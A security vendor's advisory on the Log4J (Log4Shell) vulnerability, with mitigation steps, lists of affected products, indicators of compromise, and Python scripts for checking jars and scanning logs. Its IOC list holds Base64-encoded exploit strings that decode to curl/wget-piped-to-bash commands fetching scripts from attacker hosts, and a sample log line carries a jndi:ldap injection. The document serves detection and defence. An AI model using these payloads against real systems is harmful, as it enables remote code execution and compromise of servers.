New Vulnerability in Log4J - CVE-2021-44228

by Tiago Henriques.

On Friday, a new critical vulnerability was disclosed in Log4J, a software logging library. This library is used across many Java-based platforms and powers different parts of the internet.

At Coalition, our mission is to solve cyber risk. We continuously scan the internet to identify infrastructure assets vulnerable to different cyber security risks. Since the Log4j vulnerability was disclosed, we have quickly implemented a detection capability for it. We have run the new scanner on all Coalition cyber security insurance policyholders and Coalition Control users. Additionally, we will contact all entities using vulnerable versions of the Log4j library or software that relies on Log4j.

What is Log4J?

Log4J is an open-source logging framework that developers use to record actions and activities within their applications. It is used by platforms such as Minecraft, VMware, Elasticsearch, Apple, Cloudflare, Amazon Web Services, and Tesla, along with various Apache projects such as Struts, Druid, ActiveMQ, Flume, Hadoop and Kafka, among many others.

What does this mean for me?

Don't panic. If you are a Coalition policyholder, log into your Coalition Control account and check for a notification for you to remediate issues. Additionally, we are publishing and regularly updating the next section with platforms that are vulnerable to CVE-2021-44228.

Check whether you are running any of the vulnerable software internally in your network, as Coalition Control only has visibility into assets exposed to the internet. Once you have your list of assets, it is time to mitigate the issue.

Mitigation techniques

The following is a list of Log4J mitigations. The preferred method will offer maximum protection.

Preferred

Update to Log4J 2.16.0

This completely removes the affected JNDI component. As a result, this mitigation provides maximum protection against Log4J attacks.

Acceptable, but not preferred

Update to Log4J 2.15.0.

This release disables the JNDI component by default rather than removing it, so the component can be re-enabled at a later date, whether by configuration or by a future software vulnerability that provides a vector to turn it back on. This option therefore provides less protection than 2.16.0.

Temporary only

Taken from the Log4J Bulletin:

Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

This method should only be used if none of the above mitigation methods are available to you. In some cases these mitigations can be undone by a restart of the affected software or operating system. Please consider this a temporary measure while working toward an upgrade to Log4j 2.16.0.
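The decision rule above (2.16.0 preferred, 2.15.0 acceptable, removal of JndiLookup.class only as a stopgap) can be turned into an inventory check. The following Python script is an added example, not Coalition's scanner and not code from the Log4j project: it walks a directory tree, classifies every log4j-core jar by the version in its filename (falling back to the manifest) and by whether JndiLookup.class is still inside, and builds a constructed set of sample jars so it runs offline. The sample paths, versions and placeholder class bytes are assumptions for the demonstration. The system property / environment variable mitigation is a JVM setting that cannot be seen from the jar, so a jar reported as "vulnerable" still needs to be checked at the JVM level.

```python
import os
import re
import tempfile
import zipfile
from typing import Optional, Tuple

# Class removed by the "temporary only" mitigation (zip -q -d ... JndiLookup.class)
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 16, 0)     # preferred: JNDI component removed
JNDI_OFF_BY_DEFAULT = (2, 15)  # acceptable: JNDI disabled by default, can be re-enabled


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from '2.14.1', 'log4j-core-2.16.0.jar' or '2.0-beta9'.
    Pre-release suffixes are ignored, so 2.0-beta9 parses as (2, 0, 0)."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if m is None:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify_jar(path: str) -> dict:
    """Classify one log4j-core jar by version and by whether JndiLookup.class is present.

    The log4j2.formatMsgNoLookups property / LOG4J_FORMAT_MSG_NO_LOOKUPS variable are not
    visible from the jar, so 'vulnerable' means 'not mitigated in the jar itself'."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = parse_version(os.path.basename(path))
        if version is None and "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            version = parse_version(m.group(1)) if m else None
        jndi_present = JNDI_LOOKUP_CLASS in names

    if version is not None and version >= FIXED_VERSION:
        status = "fixed"
    elif version is not None and version[:2] == JNDI_OFF_BY_DEFAULT:
        status = "acceptable"
    elif not jndi_present:
        status = "mitigated-temporarily"
    else:
        status = "vulnerable"
    return {"jar": path, "version": version, "jndi_lookup_present": jndi_present, "status": status}


def scan_tree(root: str) -> list:
    """Walk a directory and classify every log4j-core-*.jar found, sorted by path."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.startswith("log4j-core") and name.endswith(".jar"):
                results.append(classify_jar(os.path.join(dirpath, name)))
    return sorted(results, key=lambda r: r["jar"])


def build_sample_tree() -> str:
    """Constructed sample data (assumption): four tiny jars standing in for real log4j-core jars."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = [
        ("app-a/lib/log4j-core-2.14.1.jar", "2.14.1", True),   # untouched: vulnerable
        ("app-b/lib/log4j-core-2.14.1.jar", "2.14.1", False),  # JndiLookup.class deleted
        ("app-c/lib/log4j-core-2.15.0.jar", "2.15.0", True),   # JNDI off by default
        ("app-d/lib/log4j-core-2.16.0.jar", "2.16.0", False),  # JNDI component removed
    ]
    for rel, ver, with_jndi in samples:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF",
                         f"Manifest-Version: 1.0\nImplementation-Version: {ver}\n")
            if with_jndi:
                jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return root


if __name__ == "__main__":
    for r in scan_tree(build_sample_tree()):
        print(f"{r['status']:22} {r['version']}  "
              f"jndi_lookup_present={r['jndi_lookup_present']}  {r['jar']}")
```

Run it against a real host by replacing `build_sample_tree()` with the directory to inventory (for example an application server's `lib` directory); jars bundled inside WAR or EAR files are not opened by this example and need a second pass.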

If you have a WAF in front of your web applications, make sure to deploy filtering rules. Services such as Cloudflare, AWS and Google Cloud Armor already have pre-built rules available. These won't stop every attack but are still useful against more basic ones.

Vulnerable Platforms

This section contains a list of platforms Coalition has identified as potentially vulnerable to CVE-2021-44228. For major vendors you rely on that are not on this list, contact them and ask the following questions:

  • Do you use any software that relies on Log4J?
  • Have you executed any mitigations for CVE-2021-44228?
  • Did you do any investigation to confirm you have not been a victim of exploitation of CVE-2021-44228?

Known vulnerable platforms:

  • Okta RADIUS Server Agent, Okta On-Prem MFA Agent
  • Apache Struts, Solr, Druid, ActiveMQ, Flume, Hadoop, Kafka, Dubbo, Flink, Spark, Tapestry, Wicket
  • Red Hat OpenShift Container Platform 4, OpenShift Container Platform 3.11, OpenStack Platform 13 (Queens), OpenShift Logging
  • Grails
  • Ghidra
  • Minecraft
  • VMware Horizon, vCenter, HCX, NSX-T Data Center, Unified Access Gateway, Workspace ONE Access, Identity Manager, vRealize Operations, vRealize Operations Cloud Proxy, vRealize Log Insight, vRealize Automation, vRealize Lifecycle Manager, Telco Cloud Automation, Site Recovery Manager, Carbon Black Cloud Workload Appliance, Carbon Black EDR Server, Tanzu GemFire, Tanzu Greenplum, Tanzu Operations Manager, Tanzu Application Service for VMs, Tanzu Kubernetes Grid Integrated Edition, Tanzu Observability by Wavefront Nozzle, Healthwatch for Tanzu Application Service, Spring Cloud Services for VMware Tanzu, Spring Cloud Gateway for VMware Tanzu, Spring Cloud Gateway for Kubernetes, API Portal for VMware Tanzu, Single Sign-On for VMware Tanzu Application Service, App Metrics, VMware vCenter Cloud Gateway, VMware Tanzu SQL with MySQL for VMs, vRealize Orchestrator

Potentially vulnerable — can use log4j or embeds log4j

  • Apache Tomcat
  • Dropwizard
  • Elastic Kibana
  • Hibernate
  • JavaServer Faces
  • Oracle ATG Web Commerce
  • Spring Framework

A more extensive list, maintained by the cybersecurity community and Twitter user @SwitHak, can be found here.

IOCs

Indicators of compromise (IOCs) are signals we have been detecting that can be used to discover whether your organization has already been attacked or compromised through this vulnerability. If you have logs, you can search them for the following strings to help determine whether you have been compromised:

Domains:

bingsearchlib.com
dnslog.cn

IPs:

104.244.72.115
104.244.76.13
107.189.1.160
107.189.11.228
109.237.96.124
114.116.50.27
128.31.0.13
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
178.17.170.135
178.17.171.102
178.17.174.14
179.43.187.138
18.27.197.252
185.100.87.202
185.14.97.147
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.244
185.220.100.245
185.220.100.249
185.220.100.250
185.220.100.252
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.141
185.220.101.145
185.220.101.153
185.220.101.156
185.220.101.162
185.220.101.164
185.220.101.166
185.220.101.170
185.220.101.172
185.220.101.174
185.220.101.183
185.220.101.189
185.220.101.191
185.220.101.34
185.220.101.38
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.48
185.220.101.50
185.220.101.57
185.220.101.58
185.220.101.63
185.38.175.132
185.51.76.187
195.19.192.26
195.251.41.139
199.195.250.77
202.21.43.230
204.8.156.142
209.127.17.234
209.141.60.19
212.193.57.225
219.100.36.177
23.129.64.137
23.129.64.143
36.33.36.21
45.137.21.9
45.155.205.233
46.166.139.111
5.2.73.229
51.15.43.205
62.102.148.68
62.76.41.46
64.113.32.29
84.53.225.118
94.16.121.91

Strings:

jndi:ldap

/Basic/Command/Base64/

/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0Myl8YmFzaA==

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjUwOjgwODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODkuMTg4Ljc2LjI1MDo4MDgwKXxiYXNo
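As a worked example of the log search suggested in the IOCs section, the following Python script matches a subset of the domains, IPs and strings listed above against constructed sample web-server log lines. It is an added example, not Coalition's detection logic: the indicator subset is copied from the lists above (extend `IOC_DOMAINS`, `IOC_IPS` and `IOC_STRINGS` with the full lists), the sample log lines are constructed for the demonstration, and the placeholder Base64 value in them decodes to nothing meaningful. The IP matcher uses digit/dot boundaries so that, for example, the listed `5.2.73.229` does not fire on an unrelated `115.2.73.229`, a common false positive of plain substring search.

```python
import re
from typing import Dict, List, Pattern, Tuple

# Subset of the indicators listed above; extend with the full lists.
IOC_DOMAINS = ["bingsearchlib.com", "dnslog.cn"]
IOC_IPS = ["45.155.205.233", "185.220.101.34", "5.2.73.229", "109.237.96.124"]
IOC_STRINGS = ["jndi:ldap", "/Basic/Command/Base64/"]


def build_matchers() -> List[Tuple[str, str, Pattern]]:
    """Compile one regex per indicator. Domains match as whole labels (subdomains included),
    IPs are bounded by non-digit/non-dot characters, strings are case-insensitive substrings."""
    matchers = []
    for domain in IOC_DOMAINS:
        rx = re.compile(r"(?<![\w-])" + re.escape(domain) + r"(?![\w-])", re.I)
        matchers.append(("domain", domain, rx))
    for ip in IOC_IPS:
        rx = re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])")
        matchers.append(("ip", ip, rx))
    for s in IOC_STRINGS:
        matchers.append(("string", s, re.compile(re.escape(s), re.I)))
    return matchers


MATCHERS = build_matchers()


def scan_line(line: str, matchers=MATCHERS) -> List[Dict[str, str]]:
    """Return every indicator that fires on one log line."""
    return [{"kind": kind, "indicator": value}
            for kind, value, rx in matchers if rx.search(line)]


def scan_log(lines) -> List[Dict]:
    """Scan an iterable of log lines; report line number, indicators hit and the line text."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            findings.append({"line": lineno,
                             "indicators": [h["indicator"] for h in hits],
                             "text": line.strip()})
    return findings


# Constructed sample access-log lines (not real traffic). Line 2 carries an IOC string in the
# User-Agent with a placeholder Base64 value; line 3 calls out to a listed domain; lines 4 and
# 5 are benign look-alikes that a naive substring search would flag.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:14:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '45.155.205.233 - - [10/Dec/2021:22:14:03 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/QUFBQQ==}"',
    '10.0.0.9 - - [10/Dec/2021:22:15:40 +0000] "GET /api?cb=http://x.dnslog.cn/p HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '115.2.73.229 - - [10/Dec/2021:22:16:02 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:22:16:30 +0000] "GET /static/jndi_ldap_notes.html HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {', '.join(f['indicators'])}")
        print(f"    {f['text']}")
```

Feed real logs with `scan_log(open("access.log"))`. Exact-string search for `jndi:ldap` only catches the plain form of the string, so treat a clean result as one input among several (WAF and IDS alerts, outbound connection logs to the listed IPs and domains) rather than proof of no compromise.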